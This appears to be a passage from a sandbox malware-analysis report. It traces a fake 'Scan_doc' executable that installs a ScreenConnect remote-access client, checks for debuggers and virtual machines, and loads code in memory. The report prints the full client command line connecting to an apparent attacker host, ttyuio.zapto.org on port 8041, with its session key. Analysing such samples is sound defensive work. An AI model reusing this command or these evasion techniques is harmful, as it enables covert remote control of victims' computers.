                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Code function: 0_2_00834A4B FindFirstFileExA,0_2_00834A4B
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Thread delayed: delay time: 40000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599607
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599500
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599390
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599235
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599110
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\
                  Source: Amcache.hve.5.dr Binary or memory string: VMware
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2791465766.00000227204E4000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794048940.0000022721C6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3271828172.000001E57F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3274237229.000001E585054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3269939866.000000000071C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
                  Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exe - Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Process queried: DebugPort
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_0083191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00833677 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00836893 GetProcessHeap
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00831493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00834573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00831AAC SetUnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs - Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs - Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs - Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs - Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs - Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                  Source: C:\Windows\System32\svchost.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr - Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr - Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00831BD4 cpuid
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Windows\System32\svchost.exe - Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe - Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe - Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe - Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe - Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe - Code function: 13_2_00007FF848F43642 CreateNamedPipeW
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Code function: 0_2_00831806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.5.dr - Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.dr - Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.dr - Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.dr - Binary or memory string: MsMpEng.exe
